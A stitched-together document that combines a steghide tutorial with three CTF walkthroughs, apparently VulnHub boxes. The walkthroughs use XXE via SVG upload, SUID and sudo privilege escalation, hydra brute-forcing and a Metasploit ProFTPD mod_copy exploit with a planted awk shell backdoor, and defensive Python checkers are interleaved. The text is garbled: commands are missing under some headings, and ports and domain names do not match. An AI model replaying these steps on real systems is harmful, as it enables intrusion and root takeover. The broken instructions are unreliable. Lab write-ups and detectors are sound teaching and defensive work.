Table of Contents
- Introduction to Steganography
- Introduction to Steghide
- Features
- Installation of Steghide
- Getting Start with Steghide
- Functionality of Steghide
- Embedding of Data Via Steghide
- Extraction of Data Via Steghide
- Password Protect Files
- Retrieve Information of Embedded File
- Verbose Mode
- Compression Mode
- Anti-compression Mode
- Embedding File Without Name
- Encrypting Algorithms
- Overwriting the Existing File
In digital steganography, electronic communications may include steganographic coding inside a transport layer, such as a document file, image file, program or protocol. Media files are well suited to steganographic transmission because of their large size. For instance, a sender might start with an innocuous image and make a few small alterations to it in order to hide data, so that the alteration goes unnoticed by anyone who is not specifically looking for it.
Introduction to Steghide
Steghide is a steganography tool that lets you hide confidential files inside an image or audio file, protected by a passphrase. It supports the BMP and JPEG image formats and the AU and WAV audio formats. By default it uses the Rijndael (AES) algorithm with a 128-bit key to encrypt the embedded file. The tool has its advantages and disadvantages. One upside is that it is considerably better at hiding data and can easily conceal any file type. It does so by using an advanced algorithm to hide the data inside the image (or audio) file without changing the look (or sound) of the file. This also means that, without using steghide (or at least the same mathematical approach as steghide), it is hard to extract the concealed files from the image.
Features
- Compression of embedded data
- BMP, GIF and JPG supported
- Encryption of embedded data
- Decryption via password
- Uses various algorithms for encryption
Steghide can be downloaded from http://steghide.sourceforge.net/download.php; after downloading, simply unzip the files and use the tool from the command line. On Linux, open a terminal and run the following command to install Steghide:
[size=small]apt-get install steghide[/size]
Getting Started with Steghide
To start with Steghide, the most basic option is the help command, which displays all the options Steghide provides.
[size=small]steghide --help[/size]
Embedding Data in The Image
[size=small]steghide embed -ef <txt filename> -cf <media filename>[/size]
Here, ef and cf stand for the embed file (the file to hide) and the cover file (the media file that will carry it) respectively.
Extraction of Data Via Steghide
Steghide adds an extra layer of security by letting us protect the embedded data with a passphrase. To extract the hidden data, use the following command:
[size=small]steghide extract -sf <media filename>[/size]
Then enter the passphrase in order to extract the file.
Here, sf is the stego file, i.e. the media file that carries the hidden data.
Password Protect Files
We can also extract the files using the following command. It differs in that it specifies the passphrase in the command itself, so we do not need to enter it separately.

Retrieve Information of Embedded File
If we have an image that is suspected of carrying hidden data and want to know whether it does, and if so which algorithm was used to encrypt the data, we use the following command:
[size=small]steghide info <media filename>[/size]
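As an added example (not part of the original post, and not steghide's own code), the following Python helper runs the info command non-interactively across a directory and parses its report, so a defender can triage an upload folder for media files that carry embedded data. It relies on steghide's -p option to skip the passphrase prompt; the helper names are assumptions, and the two sample reports are constructed to mirror the layout steghide prints.

```python
"""Triage a directory of media files for steghide-embedded data.

Hypothetical helper (not part of steghide). Runs `steghide info -p <pass>`
on every BMP/JPEG/WAV/AU file and parses the report it prints.
"""
import re
import subprocess
from pathlib import Path

MEDIA_SUFFIXES = {".bmp", ".jpg", ".jpeg", ".wav", ".au"}

# Constructed sample of `steghide info` output for a carrier whose
# passphrase was supplied; used to exercise the parser offline.
SAMPLE_INFO_OUTPUT = '''"cover.jpg":
  format: jpeg
  capacity: 3.5 KB
  embedded file "secret.txt":
    size: 1.2 KB
    encrypted: rijndael-128, cbc
    compressed: yes
'''

# Constructed sample for a clean file (or a wrong passphrase): no embedded block.
SAMPLE_CLEAN_OUTPUT = '''"holiday.jpg":
  format: jpeg
  capacity: 12.0 KB
'''


def parse_info(output: str) -> dict:
    """Turn steghide's info report into a dict; 'embedded' is None if nothing was reported."""
    info = {"format": None, "capacity": None, "embedded": None}
    m = re.search(r"^\s*format:\s*(\S+)", output, re.M)
    if m:
        info["format"] = m.group(1)
    m = re.search(r"^\s*capacity:\s*(.+)$", output, re.M)
    if m:
        info["capacity"] = m.group(1).strip()
    m = re.search(r'embedded file "([^"]*)":', output)
    if m:
        emb = {"name": m.group(1)}
        for key in ("size", "encrypted", "compressed"):
            km = re.search(rf"^\s*{key}:\s*(.+)$", output, re.M)
            emb[key] = km.group(1).strip() if km else None
        info["embedded"] = emb
    return info


def steghide_info(path: Path, passphrase: str = "") -> dict:
    """Run `steghide info` non-interactively and parse it (steghide must be installed)."""
    proc = subprocess.run(
        ["steghide", "info", "-p", passphrase, str(path)],
        capture_output=True, text=True, check=False,
    )
    # The report goes to stdout; a wrong passphrase yields a non-zero exit
    # and a message on stderr, which is kept so the caller can see why.
    result = parse_info(proc.stdout)
    result["error"] = proc.stderr.strip() or None
    return result


def triage(directory: Path, passphrase: str = "") -> list:
    """Return [(path, info)] for every media file that reports embedded data."""
    hits = []
    for path in sorted(directory.rglob("*")):
        if path.suffix.lower() in MEDIA_SUFFIXES:
            info = steghide_info(path, passphrase)
            if info["embedded"] is not None:
                hits.append((path, info))
    return hits


if __name__ == "__main__":
    import sys
    folder = Path(sys.argv[1])
    secret = sys.argv[2] if len(sys.argv) > 2 else ""
    for path, info in triage(folder, secret):
        emb = info["embedded"]
        print(f'{path}: "{emb["name"]}" ({emb["size"]}, {emb["encrypted"]}, '
              f'compressed={emb["compressed"]})')
```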
Verbose Mode
To get every piece of information about a file during its extraction, we can use verbose mode, which prints detailed information. We enable verbose mode by running the following command:

Compression Mode
If we want to compress the text file before hiding it, we use the following command. The compression level ranges from 1 to 9: level 1 gives the fastest compression, whereas level 9 gives the best compression.

[size=small]steghide embed -ef <txt filename> -cf <media filename> -z <level>[/size]

Embedding File Without Name
We can also hide a file without embedding its name. We use this command:

Encrypting Algorithms
We can choose the encryption algorithm used for the data we are hiding, which is easily done with the following command:
[size=small]steghide embed -ef <txt filename> -cf <media filename> -e <algorithm name>[/size]

Overwriting the Existing File

Conclusion
here.
Security Level: Beginner
Penetrating Methodology:
- Scanning
- Netdiscover
- NMAP
- Enumeration
- Web Directory Search
- Exploitation
- Command Injection
- SSH
- Privilege Escalation
- Exploiting Suid rights
Scanning:
[size=small]netdiscover[/size]

Then, as usual, we used our favourite tool Nmap for port enumeration. We found that ports 22 and 3306 are open.
We observed that an HTTP service was running on port 3306.
[size=small]nmap -A 192.168.1.101[/size]

Enumeration:
We found nothing useful on the index page, so we used dirb for brute-forcing and found one directory with a .html extension.
[size=small]dirb http://192.168.1.101/3306 -X .html[/size]

We tried to access the URL and found that it is an upload page which accepts only .svg files as input.

So we took the help of Google to find a script in SVG format which we could use for XXE injection.

After doing some research we found one such script, in which we are injecting the /etc/passwd command. We copied the script and saved it as a .svg file.

Exploitation:
We tried to upload the script file and it was uploaded successfully. After uploading, we checked the page source and got the output of the /etc/passwd file.
We learned that the target has multiple users such as employee, chrony, nobody, etc.
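As an added, defender-side example (not the challenge's code), here is how an upload endpoint like the one above could reject SVG files that carry a DOCTYPE or entity declarations before any XML processing happens, using Python's expat bindings so the check fires on the DOCTYPE itself. The check_svg helper name and the three sample documents are constructed assumptions.

```python
"""Reject SVG uploads that carry a DTD or entity declarations.

Added example (hypothetical helper). The DOCTYPE and entity-declaration
callbacks run before any entity could be resolved, so a file like the one
described on this page is refused without its content ever being read.
"""
import xml.parsers.expat

SVG_NS = "http://www.w3.org/2000/svg"

# Constructed samples: a plain icon, a document whose DOCTYPE declares an
# external entity (the shape of upload to refuse), and a non-SVG file.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<rect width="10" height="10"/></svg>')
XXE_SVG = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
           b'<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>')
NOT_SVG = b'<html><body>hi</body></html>'


def check_svg(data: bytes) -> tuple:
    """Return (accepted, reason): accepted only if well-formed, DTD-free and rooted at <svg>."""
    problems = []
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        problems.append("DOCTYPE present")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        problems.append(f"entity declared: {name}")

    def on_external_ref(context, base, sysid, pubid):
        # Record the reference and report success without opening anything.
        problems.append(f"external entity referenced: {sysid}")
        return 1

    def on_start(name, attrs):
        if not root:
            root.append(name)   # expat gives "namespace-uri localname" here

    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        problems.append(f"malformed XML: {exc}")
    if problems:
        return False, "; ".join(problems)
    if not root or root[0] != f"{SVG_NS} svg":
        return False, f"root element is not an SVG: {root[0] if root else 'none'}"
    return True, "ok"


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("xxe", XXE_SVG), ("html", NOT_SVG)):
        print(label, check_svg(doc))
```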

We thought of exploring other commands using the same script.
Since the target machine is using the /bin/ash shell, we thought of checking the shell history in the /.ash_history directory by editing the script file.

After editing we uploaded the file and got some useful information from the history file, which gave us a username and a password.

So we tried to SSH to the target machine with the username employee and the password superultrapass3 which we obtained above, and were able to log in successfully.
After logging in we checked for SUID permissions for privilege escalation and found one file named micro, which turned out to be an editor tool.
[size=small]ssh employee@192.168.1.101
find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro[/size]

Privilege Escalation:
We tried to pipe the contents of the /etc/passwd file into the micro editor, where we can edit it or add new users with root privileges.
[size=small]cat /etc/passwd | /usr/bin/micro[/size]


We created the password for the new user using the openssl tool.
[size=small]openssl passwd -1 -salt user3 pass123[/size]

After that, we added the new user test with the hashed password and root privileges to the /etc/passwd file and saved it.

Once we had a user with root privileges we switched to that user, successfully got a root shell and eventually got the flag.
[size=small]su test
id
cd /root
cat flag.txt[/size]
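Added example, not from the walkthrough: a small audit of /etc/passwd that surfaces exactly the change made here (a second UID-0 account carrying an inline MD5-crypt hash), along with duplicate UIDs and any password field that bypasses /etc/shadow. The sample passwd content is constructed, and the hash on the test line is a placeholder in $1$ form, not real openssl output.

```python
"""Audit /etc/passwd for the kind of tampering a SUID editor makes possible.

Added example (hypothetical helper). Flags UID-0 accounts other than root,
password fields that hold a hash instead of 'x' (so /etc/shadow is bypassed),
empty password fields, duplicate UIDs and malformed entries.
"""
import re
import sys

# crypt-style hash prefixes: MD5 ($1$), bcrypt ($2*$), SHA-256/512 ($5$/$6$), yescrypt ($y$)
HASH_RE = re.compile(r"^\$(1|2[aby]?|5|6|y)\$")

# Constructed sample: the users seen on the page plus the planted 'test' entry.
# The hash is a placeholder with MD5-crypt's shape, not a real openssl result.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/lib/chrony:/sbin/nologin
employee:x:1000:1000:employee:/home/employee:/bin/ash
test:$1$user3$PLACEHOLDERhash0123456:0:0:test:/root:/bin/sh
"""


def parse_passwd(text: str) -> list:
    """Split passwd text into entries; field-count problems are left to the audit."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        entries.append({"lineno": lineno, "raw": line, "fields": line.split(":")})
    return entries


def audit_passwd(text: str) -> list:
    """Return (severity, line_number, message) findings for the given passwd content."""
    findings = []
    seen_uids = {}
    for e in parse_passwd(text):
        f = e["fields"]
        if len(f) != 7:
            findings.append(("high", e["lineno"], f"malformed entry ({len(f)} fields): {e['raw']!r}"))
            continue
        name, pw, uid, _gid, _gecos, home, shell = f
        if not uid.isdigit():
            findings.append(("high", e["lineno"], f"non-numeric uid for {name}"))
            continue
        if uid == "0" and name != "root":
            findings.append(("high", e["lineno"],
                             f"extra UID-0 account: {name} (shell {shell}, home {home})"))
        if pw not in ("x", "*", "!", "!!", ""):
            kind = "crypt hash" if HASH_RE.match(pw) else "unexpected value"
            findings.append(("high", e["lineno"],
                             f"password field holds a {kind} for {name}; shadow is bypassed"))
        elif pw == "":
            findings.append(("medium", e["lineno"], f"empty password field for {name}"))
        if uid in seen_uids:
            findings.append(("medium", e["lineno"], f"uid {uid} shared by {seen_uids[uid]} and {name}"))
        seen_uids.setdefault(uid, name)
    return findings


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path, encoding="utf-8") as fh:
        content = fh.read()
    for severity, lineno, message in audit_passwd(content):
        print(f"[{severity}] line {lineno}: {message}")
```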

PumpkinFestival is another CTF challenge from the Mission-Pumpkin v1.0 series, created with beginners in mind; all credit for this VM goes to Jayanth. This level is all about collecting 10 pumpkin tokens and gaining root access to collect the PumpkinFestival_Ticket.
You can download it from HERE
Level: Beginner to Intermediate
Penetrating Methodology:
- Scanning
- Nmap
- Enumeration
- FTP
- WPScan
- DirBuster
- Enum4linux
- Hydra
- Exploitation
- SSH
- Privilege Escalation
- Exploiting Sudo rights
Scanning:
Then, as usual, we used our favourite tool Nmap for port scanning. We found that ports 21 and 80 are open and SSH is running on port 6880.
[size=small]nmap -p- -A 192.168.1.101[/size]

Token 1:
Anonymous login is enabled on the FTP server, so we tried to log in using anonymous:anonymous.
Upon successful login we traversed different directories and found our first token 2d6dbbae84d724409606eddd9dd71265 inside the token.txt file.
[size=small]ftp 192.168.1.101
cd secret
get token.txt
bye
cat token.txt[/size]

Token 2:
Alohomera! Which might be useful later on.

We checked the page source and got our second token 45d9ee7239bc6b0bb21d3f8e1c5faa52.
In the page source we also found one username, Harry, which we will use at a later stage.

Token 3:
In the Nmap scan earlier we got a few directories, so we tried to access each of them one by one.
From /store/track.txt we found one username, admin, and a domain name, pumpkin.local.


After that, we accessed pumpkin.local from the browser; it turned out to be another WordPress site and we got one more flag, 06c3eb12ef2389e2752335beccfb2080.

Token 4:
There is one more directory which we got from the Nmap scan named /tokens.
2c0e11d2200e2604587c331f02a7ebea in token.txt.

Token 5:
Since we have a WordPress site running under the pumpkins.local domain name, we tried wpscan and got a file named readme.html.
[size=small]wpscan --url http://pumpkins.local -e at -e ap -e u[/size]

We also got two usernames, admin & morse, for the WordPress site, which we will use to access the admin login of the site later on.

After accessing the URL pumpkins.local/readme.html we got some code.
We tried to crack it online; it was base62 code, which gave us the password Ug0t!TrIpyJ for the users morse & jack.

As we had the password for morse, we logged in to wp-admin and got our 5th token, 7139e925fd43618653e51f820bc6201b.

Token 6:
Since we have one more wp-admin user named admin, and if you remember we also got a keyword earlier, Alohomera!, we tried this as the password to log in to the WordPress site, were able to do so, and eventually got our 6th token, f2e00edc353309b40e1aed18e18ab2c4.

Token 7:
We used DirBuster to brute-force the URL http://pumpkin.local and got one more directory named license.txt. Accessing the same directory in the browser gave us one more token, 5ff346114d634a015ce413e1bc3d8d71.



Token 8:
We have a total of four users, admin, morse, jack & harry, with passwords for only three of them.
So we tried to get harry's password by brute-forcing with hydra. We got the password yrrah.
[size=small]hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr[/size]

We logged in to the target machine's FTP using these credentials and found the 8th token, ba9fa9abf2be9373b7cbd9a6457f374e.
[size=small]ftp 192.168.1.101
ls
get token.txt
bye
cat token.txt[/size]

Token 9:
In the above screenshot you can see that there is a directory named /Donotopen. We went inside this directory and found another directory named /NO, and after a lot of traversing we finally found the file token.txt. We downloaded the file to our system and got the 9th token, 8d66ef0055b43d80c34917ec6c75f706.
[size=small]cd Donotopen
ls
cd NO
cd NOO
cd NOOO
cd NOOOO
get token.txt
bye
cat token.txt[/size]

Token 10:
From the above screen you may have seen there is one more directory, /NOOOOO; after some traversing we found a file data.txt. We downloaded the file to our Kali machine and found some random codes inside.
[size=small]cd NOOOOOO
get data.txt
bye[/size]

We checked the file type and it is a tar file. We untarred the file and got another file, data.
That file also turned out to be a zip file, and after unzipping it we got a file key; after untarring that, we finally got a file named jack which had a hexdump inside.
[size=small]file data.txt
tar vxf data.txt
tar xjf data
tar vxf key
cat jack[/size]

Then we used xxd to convert the hexdump back into binary.
We got an SSH private key.
[size=small]xxd -r -p jack > sshkey[/size]

As we had an SSH key, we used it to SSH into the target machine on port 6808 with the user jack.
8d66ef0055b43d80c34917ec6c75f706
[size=small]chmod 600 sshkey
ssh jack@192.168.1.101 -i sshkey -p 6880
file token
./token
sudo -l[/size]

Privilege Escalation/PumpkinFestival_Ticket:
From the above screenshot, we can see that jack has sudo permission for the alohomora file.
Now, to get the root shell and then finally the PumpkinFestival_Ticket, we will exploit jack's sudo permissions.
alohomora with /bin/bash copied in it.
We then gave it execute permissions and ran the file through sudo; we successfully got the root shell and eventually the PumpkinFestival_Ticket, which completes our challenge.
[size=small]mkdir pumpkins
echo "/bin/sh" > /home/jack/pumpkins/alohomora
chmod 777 /home/jack/pumpkins/alohomora
id
cd /root
ls
cat PumpkinFestival_Ticket[/size]

Download Link: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
Level: Intermediate
Task: Obtain root shell
Scanning
- Nmap
- FTP anonymous login
- Exploit proftpd using Metasploit
- Sudo right
Scanning
Then, as usual, we used our favourite tool Nmap for port scanning. Here we found that many ports were open, but port 21 for FTP looked more interesting to me, as anonymous login was allowed on the running machine for two directories, /upload and /download.
[size=small]nmap -A 192.168.1.104[/size]
Enumeration
[size=small]ftp 192.168.1.104
ls
cd download
ls
get directory[/size]
Thus, we copied the file named directory to our local machine.
[size=small]telnet 192.168.1.104 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control[/size]
Further, we navigated to /upload/version_control and found the version of the FTP service running on the host machine; moreover, we obtained the path of the webroot, i.e. /var/www/tryingharderisjoy.
Exploit
So we searched for an exploit for ProFTPD and found a Metasploit module; thus we executed the following commands to get a session on the host machine.
[size=small]use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104
msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit[/size]
We successfully obtained a command shell on the remote machine; now it was time for post-exploitation enumeration to step towards privilege escalation. Thus, we imported the Python one-liner to get a proper TTY shell and started with directory traversal.
It felt good when we dug out Patrick's credentials from inside /ossec/patricsecretofjoy.
credentials for JOY:
[size=small]patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis[/size]
Privilege Escalation
So we decided to replace the /test script with another malicious script, but there was no write permission on the /script directory.
Thus, again we decided to use the FTP anonymous login to replace the genuine /test file with a bogus /test file which would act as a backdoor providing a higher-privilege shell.
[size=small]echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test[/size]
[size=small]telnet 192.168.1.104 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test[/size]
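Added detection example (not from the walkthrough) for the SITE CPFR/CPTO copies used during enumeration and again in this privilege-escalation step: it pairs each CPFR with the CPTO that follows it per client and flags anonymous copies, copies whose source or destination leaves the FTP root, and writes into the web root. The one-command-per-line log format ('<ip> <user> <command>'), the sample lines and the FTP root path are constructed assumptions, not ProFTPD's default log layout.

```python
"""Spot ProFTPD mod_copy abuse (SITE CPFR / SITE CPTO) in an FTP command log.

Added example (hypothetical helper). Input is one FTP command per line as an
IDS, proxy or a ProFTPD ExtendedLog with the command field would record it;
the format '<ip> <user> <command>' is assumed.
"""
import re
import sys
from dataclasses import dataclass

LINE_RE = re.compile(r"^(?P<ip>\S+)\s+(?P<user>\S+)\s+(?P<cmd>.*)$")
COPY_RE = re.compile(r"^SITE\s+(?P<verb>CPFR|CPTO)\s+(?P<path>\S+)", re.I)

FTP_ROOT = "/home/ftp"        # assumed anonymous FTP root, as on the page's target
WEB_ROOTS = ("/var/www/",)    # assumed web root prefix

# Constructed sample: the two copies from the page, an anonymous write into
# the web root, and a legitimate copy inside the FTP tree by a real user.
SAMPLE_LOG = """192.168.1.50 anonymous USER anonymous
192.168.1.50 anonymous PASS anonymous
192.168.1.50 anonymous SITE CPFR /home/patrick/version_control
192.168.1.50 anonymous SITE CPTO /home/ftp/upload/version_control
192.168.1.50 anonymous SITE CPFR /home/ftp/upload/test
192.168.1.50 anonymous SITE CPTO /home/patrick/script/test
192.168.1.50 anonymous SITE CPFR /home/ftp/upload/notes.txt
192.168.1.50 anonymous SITE CPTO /var/www/tryingharderisjoy/notes.txt
192.168.1.77 patrick SITE CPFR /home/ftp/download/directory
192.168.1.77 patrick SITE CPTO /home/ftp/upload/directory
192.168.1.77 patrick LIST
"""


@dataclass
class CopyEvent:
    ip: str
    user: str
    src: str
    dst: str
    reasons: tuple   # empty tuple means the copy stayed within policy


def _outside(path: str, root: str) -> bool:
    """True when path is not root itself and not beneath it."""
    return not (path == root or path.startswith(root.rstrip("/") + "/"))


def detect_site_copy(log: str) -> list:
    """Pair each CPFR with the following CPTO per (ip, user) and evaluate the copy."""
    pending = {}   # (ip, user) -> source path waiting for its CPTO
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        c = COPY_RE.match(m["cmd"])
        if not c:
            continue
        key = (m["ip"], m["user"])
        if c["verb"].upper() == "CPFR":
            pending[key] = c["path"]
            continue
        src = pending.pop(key, None)
        if src is None:
            continue   # CPTO without a preceding CPFR copies nothing
        dst = c["path"]
        reasons = []
        if m["user"] == "anonymous":
            reasons.append("anonymous user issued SITE copy")
        if _outside(src, FTP_ROOT):
            reasons.append("source outside FTP root")
        if _outside(dst, FTP_ROOT):
            reasons.append("destination outside FTP root")
        if dst.startswith(WEB_ROOTS):
            reasons.append("write into web root")
        events.append(CopyEvent(m["ip"], m["user"], src, dst, tuple(reasons)))
    return events


def suspicious(log: str) -> list:
    """Only the copies that broke at least one rule."""
    return [e for e in detect_site_copy(log) if e.reasons]


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for e in suspicious(text):
        print(f"{e.ip} ({e.user}): {e.src} -> {e.dst}: {', '.join(e.reasons)}")
```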
[size=small]sudo /home/patrick/script/test[/size]
[size=small]cd /root
cat proof.txt
author-secret.txt[/size]
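Added example, not from either walkthrough: the same weakness appears in PumpkinFestival (sudo on /home/jack/pumpkins/alohomora) and here (sudo on /home/patrick/script/test), namely root running a file the invoking user controls. The sudoers audit below flags rules whose command sits in that user's home or a temp directory, uses a wildcard, or (with the optional filesystem check) is writable by that user; the sample sudoers text, the rule grammar it parses and the helper names are constructed assumptions.

```python
"""Flag sudo rules that let a user run, as root, a command that user can change.

Added example (hypothetical helper). Parses the common
'user HOST=(runas) [TAG:] /cmd [args][, /cmd2 ...]' sudoers line; Defaults,
comments and aliases are skipped. The sample sudoers text is constructed.
"""
import os
import re
import sys

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

SAMPLE_SUDOERS = """# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
jack    ALL=(root) NOPASSWD: /home/jack/pumpkins/alohomora
patrick ALL=(ALL) NOPASSWD: /home/patrick/script/test
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, /usr/local/bin/deploy.sh
ops     ALL=(root) /usr/bin/apt-get *
"""


def parse_sudoers(text: str) -> list:
    """Return (user, runas, tags, [command spec, ...]) for each rule line."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append((m["user"], m["runas"] or "root", m["tags"].strip(), cmds))
    return rules


def command_path(cmd: str) -> str:
    """The executable part of a command spec ('ALL' stays as is)."""
    return cmd.split()[0]


def file_writable_by(path: str, user: str) -> bool:
    """Real filesystem check: owned by user with the owner-write bit, or world-writable."""
    import pwd   # Unix only; imported here so the module loads elsewhere
    try:
        st = os.stat(path)
        uid = pwd.getpwnam(user).pw_uid
    except (FileNotFoundError, KeyError):
        return False
    return bool((st.st_uid == uid and st.st_mode & 0o200) or st.st_mode & 0o002)


def audit_sudoers(text: str, is_writable=None) -> list:
    """Return (user, command, reason) for rules that let user alter what root runs.

    is_writable(path, user) -> bool is optional; without it only path-based
    heuristics (home directory, temp directories, wildcards) are applied.
    """
    findings = []
    for user, _runas, _tags, cmds in parse_sudoers(text):
        for cmd in cmds:
            path = command_path(cmd)
            reasons = []
            if path == "ALL":
                if user != "root":
                    reasons.append("unrestricted sudo (ALL)")
            else:
                if path.startswith(f"/home/{user}/"):
                    reasons.append("command lives in the invoking user's home directory")
                if path.startswith(UNTRUSTED_DIRS):
                    reasons.append("command lives in a world-writable directory")
                if "*" in cmd:
                    reasons.append("wildcard in command specification")
                if is_writable is not None and is_writable(path, user):
                    reasons.append("command file is writable by the invoking user")
            if reasons:
                findings.append((user, cmd, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    src = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    for user, cmd, reason in audit_sudoers(src, is_writable=file_writable_by):
        print(f"{user}: {cmd}: {reason}")
```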